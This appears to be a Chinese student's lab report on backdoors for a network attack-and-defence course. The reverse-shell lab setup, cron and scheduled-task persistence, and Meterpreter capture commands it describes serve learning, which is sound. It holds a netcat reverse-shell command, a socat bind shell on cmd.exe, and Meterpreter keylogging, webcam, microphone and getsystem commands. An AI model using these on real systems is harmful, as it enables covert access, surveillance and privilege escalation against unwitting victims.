20155219付穎卓《網絡對抗技術》後門原理與實踐

時間 2019-12-08

標籤網絡對抗技術後門原理實踐欄目 Android 简体版

原文原文鏈接

基礎問題

(1)例舉你能想到的一個後門進入到你係統中的可能方式？linux

計算機安裝的某些軟件本身就帶有後門，在用戶不知情的狀況下安裝好這個軟件以後後門就進入了計算機系統。web

或者別人經過一些手段，在你不知情的狀況下將後門安裝進你的電腦。shell

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？windows

經過服務機開啓一些指令來將其開啓。安全

定時啓動。定好了啓動的時間以後後門在特定時間自動啓動tcp

開機自啓動工具

用戶點擊後啓動3d

(3)Meterpreter有哪些給你映像深入的功能？blog

獲取攝像頭行爲，感受本身的生活有可能被人隨時監視，真的可怕！crontab

(4)如何發現本身有系統有沒有被安裝後門？

應該多多用殺毒軟件進行殺毒，爭取作的日日殺毒，然而有些殺毒軟件也並不完善，下載那些表完善殺毒軟件，而且規範本身的上網行爲，不亂點，不亂下載。。。

實驗過程記錄

1、使用netcat獲取主機操做Shell，cron啓動

（一）windows獲取linux的shell

1.查看主機IP

2.查看虛擬機的IP

3.主機在ncat文件目錄下啓動監聽

4.虛擬機鏈接主機

5.咱們就在windows下得到一個linux shell，能夠運行linux的指令

6.由於linux中的指令是nc 172.20.10.10 5219 -e /bin/sh，因此咱們能夠在Windows下面運行linux的指令並獲取信息，可是咱們並不能進行通訊，若想進行通訊可在linux下輸入指令nc 172.20.10.10 5219

（二）linux獲取windows的shell

1.linux啓動監聽

2.Windows鏈接linux

3.咱們能夠在linux中看到提示

（三）啓動cron

1.在linux中輸入crontab -e命令來增長定時任務。這條定時任務就是在特定的時間主機和虛擬機會產生鏈接，在主機上會得到一個shell。我設定的是在每一個小時的第40分鐘能夠進行鏈接。

2.在第35分鐘以前沒法輸入命令，等到35分鐘時才能夠輸入命令

2、使用socat獲取主機操做Shell, 任務計劃啓動

socat的基本功能就是創建兩個雙向的字節流，數據就在其間傳輸，參數address就是表明了其中的一個方向。所謂流，表明了數據的流向，而數據則能夠有許多不一樣的類型，命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

使用socat獲取主機操做Shell

1.打開計算機管理工具裏的任務計劃程序，建立一個新的任務

2.對觸發器進行設定，在程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5219 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口5219，同時把cmd.exe的stderr重定向到stdout上

3.再對操做進行設定

4.啓動任務，在虛擬機中鏈接主機，將主機鎖定後從新打開，得到shell

3、使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

1.在linux下生成後門程序

2.在linux下輸入命令ncat.exe -lv 5219 > 5219.exe傳輸這個後門程序

3.在主機上接收這個後門程序

4.在linux下輸入msfconsole進入msf

5.在虛擬機中設置LHOST爲虛擬機IP，端口爲5210，開啓msf監聽

6.在主機上運行剛剛接收的後門程序，linux得到win的shell，可對主機執行操做

4、使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

1.獲取目標主機當前屏幕界面

使用以下命令：

還有許多別的命令：

使用record_mic指令能夠截獲一段音頻。
使用webcam_snap指令可使用攝像頭進行拍照。
使用webcam_stream指令可使用攝像頭進行錄像。
這兩項沒法作出，顯示錯誤，多是我歷來沒用過攝像頭的緣故。。。
使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄。
使用getsystem指令進行提權，如圖所示，提權成功

實踐總結

1.在啓動cron這一步時我遇到了一點小問題，個人主機不能執行虛擬機上的命令，試了不少次都失敗了，後來才發現計算機上的時間和正確的時間不同，以前我一直按照虛擬機的時間進行操做，然而在這一次我按照計算機上的時間操做就成功了。

2.在任務計劃啓動那塊一開始我建立完任務以後沒有啓動任務，致使虛擬機這邊獲取不到win的shell，將任務啓動以後就順利得到了shell

3，通過此次實踐事後以爲本身的計算機並非百毒不侵的，要提升本身的安全防範意識，要常常進行病毒查殺。

4.以前由於本身的疏忽忘記關防火牆，致使在win10系統內一直沒法激活那個後門程序，後來換了xpattacker靶機也不能夠，提示什麼「不是win32文件」。以後關閉防火牆把後門文件放入本身的主機win10，致使win10系統變得巨慢，開機還有上網都很慢，可是查殺的時候除了本身的病毒也沒有別的木馬病毒，以後作完實驗立馬把後門文件刪除，重啓以後電腦就恢復正常了，有個疑問，爲啥本身作的後門病毒也會是電腦變慢？明明本身啥都沒作啊QAQ？